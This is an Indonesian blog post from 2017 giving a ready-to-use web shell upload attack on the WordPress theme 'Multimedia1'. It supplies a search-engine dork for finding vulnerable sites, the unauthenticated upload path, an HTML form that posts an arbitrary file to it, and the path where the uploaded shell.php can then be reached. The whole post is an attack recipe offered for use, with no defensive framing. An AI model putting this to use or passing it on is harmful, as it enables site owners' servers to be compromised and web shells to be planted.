Sabtu, 20 Mei 2017

Wordpress Themes Multimedia1 Shell Upload Vulnerability

Tags


Dork:
inurl:/wp-content/themes/multimedia1/

Exploit:
wp-content/themes/multimedia1/server/php/

Example:
www.target.co.li/wp-content/themes/multimedia1/server/php/

CRSF:
<html>
<body>
<form enctype="multipart/form-data" action="target.co.li/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
Lokasi akses shell:
www.target.co.li/wp-content/themes/multimedia1/server/php/files/shell.php

 
 


EmoticonEmoticon